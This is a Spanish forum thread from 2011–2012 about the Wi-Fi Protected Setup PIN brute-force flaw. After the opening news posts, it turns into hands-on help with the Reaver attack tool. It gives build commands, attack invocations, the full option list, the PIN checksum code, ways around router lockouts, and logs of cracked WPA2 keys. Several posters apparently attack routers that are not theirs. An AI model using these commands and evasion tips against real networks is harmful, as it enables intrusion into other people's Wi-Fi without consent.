Lampiweb.com

Auditoria Wireless => Auditoria general => Mensaje iniciado por: soyelcoronel en Diciembre 28, 2011, 22:27:31 pm

Título: Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: soyelcoronel en Diciembre 28, 2011, 22:27:31 pm
Wi-Fi Protected Setup es un sistema para establecer conexiones inalámbricas seguras WPA2 a partir del uso de un PIN secreto que sólo conocen el inscrito (enrollee) y el secretario (registrar). Bien, a través de Slashdot me he encontrado con que vuelve a ocurrir como con WEP: WPS tiene problemas que facilitan sobremanera el ataque por fuerza bruta para determinar el PIN. También es cierto que, incluso con este mecanismo, sacar el PIN puede costar hasta cuatro horas de ataque continuo, lo que lo hace bastante menos interesante que WEP (que suele caer en menos de media hora, normalmente), pero aún así...

Enlaces: Barrapunto, Fuente, Traducido con Google, he detectado un error en la traducción:
"El número de intentos van desde 10^8  hasta 10^4 + 10^3, que es de 11.000 intentos de en total " dice el aviso del US-CERT.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Diciembre 28, 2011, 22:30:58 pm
La noticia es buena.. la muevo a actualidad. Estaba esperando que el compi mak74 que me lo comentó hace un rato la publicase:


[img width=350 height=262]http://img46..us/img46/3729/31520520.jpg[/img]


Wi-Fi Protected Setup (WPS) se ha convertido en un método popular entre los fabricantes de routers para añadir nuevos dispositivos a la red Wi-Fi. De esta manera con tan sólo tocar un botón en el router en el momento adecuado un usuario puede añadir un dispositivo Wi-Fi sin necesidad de recordar clave alguna.

El investigador de seguridad Stefan Viehbock acaba de descubrir un agujero de seguridad importante que mediante ataque fuerza bruta permite acceder a una red con protección WPS en cuestión de 2 horas.

El problema llega en la falta de seguridad en la implementación del PIN de 8 dígitos WPS. Según parece, cuando los cuatro primeros dígitos del PIN son erróneos el router informa de ello mientras que los 4 dígitos finales forman parte de un checksum que ofrece el router como parte de la negociación.

Esto implica que de los posibles 100 millones de combinaciones que ofrece en un principio el sistema WPS se queda entre 11.000 y 9.000 veces menos, que puede explotarse en aproximadamente 2 horas.

Se ha comprobado que routers Buffalo, D-Link, Linksys y Netgear son vulnerables. Es posible que otros routers también lo sean.

De momento no hay actualización de firmware para solucionar este problema y la recomendación básica es desactivar la posibilidad de conexión vía WPS y activarla sólo para cuando queramos añadir nuevos dispositivos.


fuente

blog del autor
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: mak74 en Diciembre 28, 2011, 23:44:43 pm
Hola Maripuri,

Acabo de volver a entrar en el foro y veo que ya habeis publicado la noticia...Good Job !!

Seria interesante saber que routers y de que compañias tienen este protocolo WPS activado por defecto..

Quizas si se libera el código, sea interesante saber donde poder probarlo..

Gracias..
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Diciembre 29, 2011, 00:33:09 am
Si, soyelcoronel vio la noticia y la publicó.. luego añadí lo que me habías comentado. Habrá que estar al tanto de esto y hacer unas pruebas.    ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Diciembre 30, 2011, 18:03:11 pm
Lo que uno se encuentra cuando vuelve de vacaciones  ;D
Eso es adónde ha llegado un miembro de crack-wifi.com
Citar
./reaver -i mon0 -b 00:1D:6A:6B:2F:87 -c 6 -v

Reaver v1.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

  • Waiting for beacon from 00:1D:6A:---------
  • Associated with 00:1D:6A:6B:2F:87 (ESSID: Livebox-4xxa)
  • 0.02% complete @ 16 seconds/attempt
  • 0.05% complete @ 11 seconds/attempt
  • 0.09% complete @ 6 seconds/attempt
  • 0.13% complete @ 5 seconds/attempt
  • [!] WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying
    [!] WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying
    [!] WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying
    [!] WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying
Si algunos quieren probar, se hace desde linux en liña de comando en un treminal
Código: [Seleccionar]
sudo su
svn checkout http://reaver-wps.googlecode.com/svn/trunk
cd trunk
cd src
./configure
make
make install

el sudo su sirve para tener permisos de administrador en el terminal durante todos los comandos
svn ...  es ara ir en internet y buscar reaver para descargarlo
cd ya sabeís, cómo en windows, para situarse en el directorio
-/configure y make + make install es para instalar

parece que algunos modelos de zyxel y TP-link son potencialmente vulnerables.

y el uso es simple, acaba de salir la ultima versión hace 27 minutos
http://code.google.com/p/reaver-wps/downloads/detail?name=reaver-1.2.tar.gz&can=2&q=

esto se mueve bien parece  ;D

http://www.youtube.com/watch?v=5_gELLGJSY8
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Diciembre 30, 2011, 18:37:09 pm
La vulnerabilidad es realmente muy grave..

Brute forcing WiFi protected Setup  PDF

Existe ya una publicación y una herramienta (una libre y una de pago)

Tactical Networks Solutions

reaver-wps

Creo que veremos ataques efectivos a router's con WPS en poco tiempo. Voy a fijar el tema

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: soyelcoronel en Diciembre 31, 2011, 00:50:27 am
Ya ha salido otra herramienta de un tal Stefan Viehbock, incluso asegura que él la detectó antes:

Citar
As you probably already know, this vulnerability was independently discovered by Craig Heffner (/dev/ttyS0, Tactical Network Solutions) as well – I was just the one who reported the vulnerability and released information about it first. Craig and his team have now released their tool “Reaver” over at Google Code.

My PoC Brute Force Tool can be found here. It’s a bit faster than Reaver, but will not work with all Wi-Fi adapters.

Enlace de Engadget y de Stefan.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: dirneet en Diciembre 31, 2011, 10:12:41 am
Esta informacion es extraida del firmware router comtrend vr-3025-un
DEF_WLANn_WSC_PIN y WLANn_WSC_PIN

Función: Se especifica el PIN utilizado en el registro de protocolo. Las fábricas deben asignar única de cuatro (sin checksum) u ocho (con suma de comprobación) dígitos numéricos a DEF_WLANn_WSC_PIN y WLANn_WSC_PIN de cada dispositivo antes de que es enviado. WLANn_WSC_PIN podría ser cambiado por la página web. la fórmula de cálculo y validación de suma de comprobación es la siguiente.

La fórmula de cálculo de suma de comprobación:

Código: [Seleccionar]
int ComputeChecksum(unsigned long int PIN)
{
unsigned long int accum = 0;
PIN *= 10;
accum += 3 * ((PIN / 10000000) % 10);
accum += 1 * ((PIN / 1000000) % 10);
accum += 3 * ((PIN / 100000) % 10);
accum += 1 * ((PIN / 10000) % 10);
accum += 3 * ((PIN / 1000) % 10);
accum += 1 * ((PIN / 100) % 10);
accum += 3 * ((PIN / 10) % 10);
int digit = (accum % 10);
return (10 - digit) % 10;
}

La fórmula de validación de la suma de comprobación:

bool ValidateChecksum(unsigned long int PIN)
Código: [Seleccionar]
{
unsigned long int accum = 0;
accum += 3 * ((PIN / 10000000) % 10);
accum += 1 * ((PIN / 1000000) % 10);
accum += 3 * ((PIN / 100000) % 10);
accum += 1 * ((PIN / 10000) % 10);
accum += 3 * ((PIN / 1000) % 10);
accum += 1 * ((PIN / 100) % 10);
accum += 3 * ((PIN / 10) % 10);
accum += 1 * ((PIN / 1) % 10);
return (0 == (accum % 10));

Cuando el dispositivo se actualiza el firmware, hay una posibilidad de que el ajustes por defecto y la sección actual de fijación puede ser recargada
en el código por defecto los valores debido a la versión MIB no coinciden. En este caso, DEF_WLANn_WSC_PIN WLANn_WSC_PIN y se le asignará
12345670.

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Diciembre 31, 2011, 14:50:34 pm
El reaver no me detecta el ar9271 de mi TP-Link WN422G...
En el vídeo que ha hecho el autor de reaver se ve funcionando con un rtl8187l.
Voy a probar con otro chipset quizás tengo más suerte con un chipset PCI.
De momento desde crack-wifi.fr alguien ha llegado a 10% del ataque en una hora y media... a ver si ha acabado hoy.
De toda forma estoy seguro de que tenemos algo, si miramos el código vemos que es largo, completo, curado y coherente.
O sea no es un fake.
La otra aplicación (wpscrack) es un script python, a ver que tal... hay menos documentación.



Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Diciembre 31, 2011, 14:54:45 pm
Veo avances, así que mejor movemos el tema a Auditoría WPA
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: mak74 en Diciembre 31, 2011, 16:04:01 pm
Hola a todos,

He estado haciendo pruebas con ambas herramientas, yo tengo una Alfa awus036nh y me pilla bien los drivers..

Con el reaver v. 1.2 he hecho pruebas con una Orange-xxxx y una Vodafonexxxx se me asocia pero al tirar 2 pin se me desconecta... (quizas no sean vulenrables..)

Las pruebas las he realizado con un backtrack4 r2   

En cuanto a la otra herramientas wpscrack el creador lo ha probado en un bactrack5 r1 e instalando la herramienta scapy v 2.2.0 (la cual no viene instalada en backtrack) y luego instalando su herramienta wpscrack

Tambien la he probado pero no es capaz de asociarse a ningun AP, las proximos dias me bajare backtrack5 r1 y os ire comentando ya que lo he probado con bactrack4 r2 que tenia a mano..

Ojala alguien tenga algo mas de suerte !!
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Diciembre 31, 2011, 17:51:25 pm
Hoy he estado un ratito tratando de compilar wpscrack.py para Windows pero solo consigo errores..    :'(

A ver el año que viene..    ::)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: antonio5893 en Enero 02, 2012, 18:52:36 pm
Hola, tengo un router netgear cg3100d de ono, me gustaria comprobar su vulnerabilidad WPS, alguien ha probado el reaver y el wpscrack con ese router, gracias


reaver
http://code.google.com/p/reaver-wps/wiki/README

wpscrack
http://sviehb.wordpress.com/2011/12/27/wi-fi-protected-setup-pin-brute-force-vulnerability/
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 02, 2012, 19:06:40 pm

[img width=489 height=426]http://img706..us/img706/8793/capturavip.jpg[/img]


Conseguido por superbobo de crack-wifi.com en 22horas.
Ataque completo; rompe el PIN WPS y recupera la llave WPA
Routeur Belkin, no se que modelo exactamente.
Parece que no funciona con livebox2... 

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: haroll en Enero 02, 2012, 22:00:57 pm
Hola buenas,estaba probando la nueva herramienta Reaver1.2 y con una red vodafonexxxx se me queda Asociated with (vofadonexxxx)y nada...me gustaria saber si puede ser porque no tenga WPS pro segun he leido parece q si q tiene.Necesito ayuda...
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: antoalmobeni en Enero 03, 2012, 00:59:06 am
Hola!
tengo una duda con esto de WPS, "tengo" una red Orange-xxxx que tiene WPS pero al intentar conectarme me dice que ponga la clave WPA/WPA2 o pulse el boton de enrutamiento, mi duda es la siguiente:
con REAVER WPS 1.2 podria obtener la clave WPS?y si es asi como la utilizo para conectarme a la red Orange-xxxx?es que no me aparece nada de poner PIN de WPS solo que pulse el boton de enrutamiento del router
Un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 03, 2012, 04:01:27 am
Puede funcionar con tu routeur.
Yo no pasé de los 0,3 %, luego se me desautentica y no vuelve a asociar...   :(
También con una red orange-xxxx, bssid tipo 00:19:70... Z'com.inc
@Haroll
si no hay WPS, ni te asocia. Muchos routeurs parecen ser equipados contra este ataque...
puedes jugar con el argumento -d para aumentar el rato de tiempo entre intentos de PIN y -T para aumentar el tiempo entre M5-M7 y t para el time out
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ppp222ppp en Enero 03, 2012, 11:23:16 am
yo lo he probado con una FTE-xxxx, me dice asociado pero se queda ahi y ya no hace nada mas.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: mkway en Enero 03, 2012, 11:29:48 am
hola buenos dias he leido el tema pero no se mucho , alguien me puedo explicar si hay algun programa como el wifiway q se pueda hacer esto o tengo q instalar en mi pc el linux . tengo varias redes como jazztel wlan ono y quisiera probarlas gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: haroll en Enero 03, 2012, 12:24:06 pm
Hola buenas,anoche consegui asociarme con Un router Vodafone...Y iva todo bien..probando pins y tal...cuando iva x el 0.10% se desautentifico y me ponia 315 seg...y nada...ay se kedo,Alguien sabe q pasa!?Gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 03, 2012, 12:52:15 pm
Algunos, (o muchos  :P ) routeurs detectan este actividad rara y bloquean las peticiones de acceso.
Los livebox y los orange-xxxx de z.com y SAGEM parecen estar muy bien equipados en contra del crack via WPS (aunque lleven el wps activado por defecto)
Código: [Seleccionar]
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
[+] Switching mon0 to channel 12
[+] Switching mon0 to channel 13
[+] Switching mon0 to channel 14
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Associated with 00:19:70:xx:xx:xx (ESSID: Orange-exxa)
[!] WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying

Lo he dejado en acción toda la noche, ha llegado a unos 0,2 % probando una decena de PIN, siempre esta desautenticado...

Queda provar las opciones y ir actualizando via svn el tool que los autores se lo estan curando mucho y ya van 3 revisiones en estos periodos de fiesta... admirable,

Código: [Seleccionar]
Optional Arguments:
-m, --mac=<mac>                 MAC of the host system
-e, --essid=<ssid>              ESSID of the target AP
-c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
-o, --out-file=<file>           Send output to a log file [stdout]
-f, --fixed                     Disable channel hopping
-5, --5ghz                      Use 5GHz 802.11 channels
-v, --verbose                   Display non-critical warnings (-vv for more)
-q, --quiet                     Only display critical messages
-h, --help                      Show help

Advanced Options:
-p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
-d, --delay=<seconds>           Set the delay between pin attempts [1]
-l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [315]
-g, --max-attempts=<num>        Quit after num pin attempts
-x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
-t, --timeout=<seconds>         Set the receive timeout period [5]
-T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
-L, --ignore-locks              Ignore locked state reported by the target AP
-E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
-n, --nack                      Target AP always sends a NACK [Auto]
-w, --win7                      Report to the AP that we are a Windows 7 registrar [False]
He probado quitando le el delay (a piñon) añadiendo -d 0, pero el routeur te sale enseguida

@mkway
Citar
tengo q instalar en mi pc el linux
No esta aún en ninguna live entonces tienes que instalarte linux en una partición de tu HD. Luego has de instalar aircrack-ng, libpcap y por fin WPS reaver.
Te aconsejo instalar un derivado de Debian (sencillo, documentación abundante) como lo son Backtrack (mejor distro wireless de todos los tiempos que viene con drivers y aircrack-ng instalado) o mi favorita Xubuntu o aún la distro gran publica más usada:  Ubuntu.
Linux Mint parece muy buena también.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: VALENCIA en Enero 03, 2012, 13:15:16 pm
Hola!   maripuri puedes  auydarme .  que modelo bactrac  porta   Reaver WPS. o tengo que istalar  aparte.   e probado  con wifiway2  sale error .Gracias.

un saludo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Enero 03, 2012, 19:10:52 pm
@VALENCIA

Algún compi lo hará, solo probé el otro día a tratar de compilar para Windows pero no supe. Tienes este hilo que abrió kcdtv para empezar desde cero.

WPS reaver desde 0

Pienso que mejor muevo este tema también a linux pues es el entorno donde actualmente corren las aplicaciones, cuando haya algo para Windows creamos uno nuevo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: MEGAHOM en Enero 03, 2012, 20:40:36 pm
Yo me encontré con una de estas haciendo pruebas en una torre de un colega saque la clave y luego me pedía el PIN y el pin si no recuerdo mal son cinco 55555 otro colega hizo la prueba con otra y el pin era el mismo no se si será casualidad o no, lastima que desde mi casa no tengo ninguna para volver a probarlo

Un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 04, 2012, 01:29:16 am
Esta noche me pase en a casa de colegas y he logrado asociar, probar varios PIN, desgraciadamente he tenido que parrar, el ultimo metro no espera...
Pero por primera vez vi de mis ojos un ataque decente ponerse de pie
(http://img835..us/img835/8273/vpsreaver.png)
llegue a un poco más de 1,5% en unos 8-10 minutos
Era un routeur con essid ONO-XXXX, WPA un GG3100 algo, no he bien anotado el nombre.
Orange, livebox, cuando tienen el WPS enchufado, son muy repelentes al WPS reaver.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: haroll en Enero 04, 2012, 16:31:33 pm
Sera posible saltarse esa seguridad de los router aumentando el tiempo de envio?...Aunq claro tardarias mas de el doble de tiempo.Por ejemplo cambiando de mac constantemente,etc...
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ppp222ppp en Enero 04, 2012, 16:49:22 pm
Esta noche me pase en a casa de colegas y he logrado asociar, probar varios PIN, desgraciadamente he tenido que parrar, el ultimo metro no espera...
Pero por primera vez vi de mis ojos un ataque decente ponerse de pie
(http://img835..us/img835/8273/vpsreaver.png)
llegue a un poco más de 1,5% en unos 8-10 minutos
Era un routeur con bssid ONO-XXXX, WPA2, no me recuerdo que tipo de bssid.
Orange, livebox, FTE y vodafone, cuando tienen el WPS enchufado, son muy repelentes al WPS reaver.

que opciones has ulizado en la linea de comandos? yo de momento uso reaver -i mon0 -b macap y la mayoria de veces se me asocia y al rato se me desasocia.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: nico9999 en Enero 04, 2012, 22:09:39 pm
hola buenas yo e conseguido sacar una key de un wpa2 con backtrack 4 + reaver-1.3 de una onoxxxx con mac C0:3F:0E EN 11 h
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: mak74 en Enero 04, 2012, 23:13:26 pm
Hola,

Yo he probado con una AWUS036NH contra una Orange-XXXX y una Vodafone-XXXX y nada de nada...me deja tirar un pin y luego se desasocia...o da error de TimeOut..

Le he pasado logs al creador del reaver y dice que son vulnerables pero posiblemente sea por la distancia al router....yo creo que es mas por la tarjeta..porque los tengo con > 70% potencia de señal...

Si alguno tiene uno cerca y prueba...que comente resultados..Bssid, potencia de señal y driver de su tarjeta wireless..

Seguiremos informando...
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 05, 2012, 00:08:39 am
¡Enhorabuena posi69!


Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: mkway en Enero 05, 2012, 09:59:49 am
hola buenos dias he instalado backtrack 5 y he instalado el reaver 1.3 pero tengo un problema q no me detecta mi targeta de red TL-WN422G con el chip 9271 alguien me puede decir los pasos q hay q dar para instalarlo gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 05, 2012, 10:11:34 am
¿Porque no abres un tema tipo "WN422G (ar9271) en Backtrack5"?
Y de paso pon el resultado de los siguientes comandos en consola:
Código: [Seleccionar]
lsusb
Código: [Seleccionar]
sudo airmon-ng
Código: [Seleccionar]
iwconfig
Citar
la versión 1.3 es mas rápida y ademas cuando encuentra los 4 dígitos primeros sobre el 7% +- te pone el porcentaje en 90% y solo prueba los 4 últimos.

Esto es normal y no tiene que ver con la versión de reaver. El PIN WPS se puede obtener mediante brute force por bloque de 4 dígitos.
Y en el segundo grupo de 4 dígitos, el ultimo es  un checksum de los 7 precedentes.
O sea una vez que se obtiene los 4 primeros  dígitos quedan solo 1 000 posibilidades (3 caracteres desconocidos base 10)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: mkway en Enero 05, 2012, 10:29:52 am
con esos pasos  no me detecta la targeta de red escribo sudo airmon-ng y no me sale ningun tipo de chipset ni nada pero ya he puesto el tema en backtrack 5 como me lo has recomendado gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 05, 2012, 11:22:26 am
Funciona con el chipset Ralink N de alta potencia
Ralink RT2870/3070
comprobado con una wifsky 2000mw
los drivers vienen de serie en cualquier distro linux reciente.  ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: molini en Enero 05, 2012, 12:28:43 pm
ola a todos, yo tb e sacado un wpa2 de onoxxxx con backtrack 5r1+reaver 1.3 de la mac C0:3F:0E en unas  9h y media ahora si que puedo decir que son 10 caracteres numericos.
 ;D le e echo fotos pero todavia no se subirlas bien al foro
un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ppp222ppp en Enero 05, 2012, 12:44:46 pm
al instalar rever 1.3 pongo  ./configure y al final me da el error:sqlite3 library nof found.
alguien sabe donde puedo encontrar dicha libreria o porque se porduce este error?. gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 05, 2012, 14:25:04 pm
Citar
Esta vez lo hacemos por via gráfica, es decir nos dirigimos al menú inicio/Sistema/Gestor de paquetes synaptic (flecha amarilla de la captura de pantalla del escritorio)
(...)escribiendo "Sqlite3" en el cuadrado de búsqueda. Instalaís el paquete
Luego ponéis en el mismo cuadro "sqlite-devel" (paquetes de desarollo) y elegir el paquete "libsqlite3-dev". instalar lo.

Punto 6 del 1er post del hilo http://lampiweb.com/foro/index.php?topic=8086.msg48393;topicseen#new
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: mak74 en Enero 05, 2012, 17:51:59 pm
@posi69

Excenlente trabajo, yo tengo una AWUS036NH y exactamente me ocurre lo mismo que has puesto en tu captura de pantalla..

Quedamos expectantes para que nos comentes mas pruebas realizadas, sobre otros AP..

Salu2

mak
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: mkway en Enero 05, 2012, 18:04:26 pm
hola buenas tengo un problema haber si alguien me puede ayudar. al poner el comando airodump-ng mon0 me empieza a buscar las redes existente y no para de buscar nunca y al poner en otra pantalla   reaver -i mon0 -b   consu bssi correspondiente se me qda en  associated whith  no se si esta bien y tengo q dejarlo asi q se vaya reyenando o me falta algo gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: dragonfly en Enero 05, 2012, 18:32:41 pm
Tienes que detener el airodump, situate en la consola y pulsa Ctrl+C, y despues lanza el reaver

Saludos
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: managuas en Enero 05, 2012, 20:38:17 pm

haber cuando sacan el tal rever ese en modulo para las liveusb
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kyrandio en Enero 05, 2012, 21:51:24 pm
hola chic@s,,,creo que es una pregunta tonta,,,pero ahi va,, para ejecutar digamos algo parecido al reaver en windows,,,¿no hay nada? lo digo para quien no se sabe manejar muy bien en linux,  gracias y saludos.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: yliazid en Enero 05, 2012, 22:06:32 pm
Hola, he conseguido el PIN y tambien la clave WPA2 CCMP de un router Linksys E1000 en casi 4 horas usando el reaver-wps 1.3 bajo backtrack 4 R2 con tarjeta wifi intel pro wireless 3945. El comando fue:
" reaver -i mon0 -b MAC ROUTER -vv --dh-small "

Antes pase un programa que esta dentro de carpeta src de reaver 1.3 que se llama walsh que sirve para ver los AP que soportan WPS y por tanto vulnerables a este ataque. Tengo que tambien probé con otro router y llegue solo al 20% y ahi se quedó. 1 saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: mkway en Enero 05, 2012, 22:09:40 pm
ok gracias por la explicacion me ha echo muy util. tengo unas cuantas red de onoxxxxxx de jaztel pero se qdan en ¨ associated whith¨ y tengo otra wlan q es la unica q corre q no se qda hay alguien sabe si se pueden cojer o este programa no valen para ese tipo de redes
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: amporio en Enero 05, 2012, 22:32:24 pm
Hola,yo tambien un TP-LIN-XXXXXX   AES-CCMP  WPA2/PSK  BAJO Ubuntu Precise Pangolin casi 4 horas y pico con AWUS036H con el chipset rtl8187ly comando por defecto

menudo regalo de reyes
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ñanduti en Enero 05, 2012, 23:12:42 pm
 (managuas) "haber cuando sacan el tal rever ese en modulo para las liveusb"
sino me equivoco ayer ya sacaron  un modulo para las liveusb por usuarionuevo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: managuas en Enero 06, 2012, 00:04:54 am
muchas gracias pero me e perdido
donde lo quitaron
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: atim en Enero 06, 2012, 00:23:15 am
(managuas) "haber cuando sacan el tal rever ese en modulo para las liveusb"
sino me equivoco ayer ya sacaron  un modulo para las liveusb por usuarionuevo
Yo me he instalado una live en un pendrive en modo persistent changes para que se guarden los cambios, después me he instalado el reaver y funciona perfectamente.
  Lo que no tengo claro es si mi chisept es compatible.
Lo he probado y después de asociarme me pone lo siguiente:
[!] WARNIG: Receive timeout occurred
Trying pin xxxxxxxx y siempre sale lo mismo y el mismo ping despues siempre 0%.

   Tengo una atheros con el AR5005GS de lo mejorcito para auditorias en linux y compatible 100% con el ERW en windows
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: haroll en Enero 06, 2012, 14:12:31 pm
Hola,tengo una Alpha AWUSO36H Y Backtrack5 Instalado el reaver1.3 y probado con una vodafoneXXXX q cojo 90% y nada de nada error de time out.!!Alguien sabe q pasa!??Gracias a todos sois unos makinas.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 06, 2012, 14:46:52 pm
Personalmente no he podido con vod afonexxxx aunque tienen el WPS...
Si tu chipset es el RTL8187l tienes el que esta dando los mejores resultados, asi que opino quel problema puede ser la distancia o la resistencia del dispositivo al ataque.
Si tienes backtrack, puedes abrir el wireshark y capturar los paquetes y mandarlos al sitio de los creadores de WPS reaver.
Estan estudiando para mejoras  ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: haroll en Enero 06, 2012, 15:36:50 pm
Vale,gracias...Mandare los paquetes capturados,Ah otra cosa tamb intente con Orange-xxxx y lo mismo nada d nada errores y tal...Tamb mandare paquetes d esta,conforme vallais probando estaria bien ver los resultados y comparar velocidades de comprobacion etc...Supongo q cada router tendra su "seguridad" y otra pregunta xq sale el mensaje de 315 seg....Se debe a una proteccion del router!?¿Se podria solucionar?Gracias x todo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Enero 06, 2012, 16:25:00 pm
LLevo observando este hilo desde que se inició hace unos días.. no creo que haya falta recordar lo que todos sabemos.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: vainiya en Enero 06, 2012, 16:38:31 pm
Yo tengo una Atheros AR9285, la cual siempre me ha ido bien en linux (uso Ubuntu siempre, pero para auditar prefiero Wifiway) y mi router Vodafone-XXXX parece invulnerable a este ataque. Estaré pendiente de la evolución no vaya a ser que mejoren el reaver y se consiga petar el WPS de mi router invulnerable.

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pikomule en Enero 06, 2012, 17:07:22 pm
a mi el reaver 1.3, la primera vez que lo use con mi FTE-xxxx me llego al 50%, a partir de ese dia, nunca mas he conseguido nada, solo Warning: Receive timeout Occurred
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: mak74 en Enero 06, 2012, 17:40:17 pm
Hola a todos,

He estado mirando un poco las incidencias de reaver y las posibles soluciones que estan aplicando:

1) Para el error:



Entorno --> bt5 r1 vmware
driver usado ralink rt2800usb

Despues de muchos datos subidos etc...y decir que con aircrak va bien..esto es lo que comenta Craig

Aircrack has their own capture/injection library, while Reaver uses libpcap. We're working with the aircrack team to get Reaver integrated into the aircrack suite so that Reaver will use all of their libraries as well.

Asi que parece que habra que esperar un poco para ver si lo integran con reaver y luego va ok.. (Incidencia 90)

2) Error

[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying

It looks like the AP is locking WPS; depending on the AP this could be a temporary or a permanent lock. Reaver 1.3 has a known bug where it does not recognize when the AP has unlocked WPS, try using the SVN code.

Vamos que el AP bloquea temporalmente el WPS pero que intente usar la ultima versión...(entiendo mi ingles no es muy ducho..)

svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only

Incidencia 98

3) Error

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Enero 06, 2012, 22:23:08 pm
Citar
si veo alguna otra incidencia ire posteando si a Maripuri y al resto les parece bien..
A mi me parece perfecto.

Citar
maripuri, podria crear un hilo nuevo para recoger los router compatibles con wps
Por mi bien. En este sería un lío.. lo único se puede tratar de hacer en el que abrió kcdtv en el post que abre el tema pero ya digo.. por mi no hay incomveniente

Driver soportados:

